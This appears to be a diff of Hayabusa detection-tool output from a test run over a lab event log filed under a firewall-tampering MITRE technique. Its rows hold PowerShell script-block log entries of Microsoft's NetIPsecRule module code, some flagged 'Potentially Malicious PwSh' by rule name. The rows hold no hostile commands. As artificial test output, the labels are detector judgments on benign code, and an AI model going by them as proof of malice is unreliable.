$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 